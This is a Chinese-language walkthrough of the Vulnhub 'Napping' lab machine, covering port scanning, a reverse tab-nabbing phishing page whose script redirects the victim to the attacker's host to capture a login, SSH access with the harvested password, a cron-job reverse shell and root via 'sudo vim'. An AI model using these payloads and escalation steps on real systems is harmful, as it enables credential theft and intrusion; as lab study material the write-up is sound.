标签：1.0 NAPPING 端口 192.168 window html Vulnhub 靶机 8000

前期准备：

靶机地址：https://www.vulnhub.com/entry/napping-101,752/

kali攻击机ip：192.168.11.129
靶机地址：192.168.11.137

一、信息收集

1.使用nmap对靶机进行端口扫描

nmap -A -p 1-65535 192.168.11.137

发现开放了22和80端口。

2.收集80页面的信息

发现是个登录界面，还可以注册，先注册一个账户试试：

注册完成后登录进去：

发现有个输入框，看样子是提交连接，随便写入一个地址试试：

提交之后再点击 Here 会跳转到你输入的连接：

查看源代码，发现站点上的此特定 URL 链接功能容易受到 Tab Nabbing 的攻击

二、漏洞攻击

1.钓鱼

知道了使用 Tab Nabbing 攻击后，我们先做个钓鱼界面，首先先复制登录界面：

接下来，我们构建我们的恶意 html （sain.html）界面：

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
    </script>
</body>
</html>

把自己复制的 index.php 和 sain.html 页面放到 /var/www/html 下，并且开启 python3-http 服务，开的 80 端口，和 sain.html 中的端口区分开：

监听恶意 html 中的 8000 端口， nc -lvvp 8000 在靶机的提交连接界面提交 python3-http 服务下的 sain.html 地址：

点击提交即可，等了一会监听的 8000 端口返回了数据包：

靶机中设定的隔几分钟就会用用户登录，此时我们获取了数据包

username=daniel
password=C@ughtm3napping123

得到了用户名和密码，我们可以通过ssh进行登录。

2.ssh登录

查看一下用户信息：

可以看到 daniel 是管理员组的一部分。

使用 find 我们可以查找任何我们可以使用命令访问的有趣文件

find / -group administrators -type f 2>/dev/null

查看一下 query.py 文件：

根据site_status.txt文件，它似乎每 2 分钟执行一次：

三、提权

我们需要先跳转到 adrian 用户，所以我们继续在 /dev/shm 目录中创建一个反向 shell bash 脚本：

直接运行的话还是 daniel 用户，我们需要更改一下 query.py 这个个脚本来让他定时反弹shell：

nc 监听，等了一会得到反向shell：

获得 adrian 用户，查看以下权限：

发现可以再没有在没有密码的情况下以 root 身份运行 vim ，那就直接写入 Vim-shell：

sudo /usr/bin/vim -c ':!/bin/sh'

得到root：

标签：1.0,NAPPING,端口,192.168,window,html,Vulnhub,靶机,8000
来源： https://www.cnblogs.com/sainet/p/15650122.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。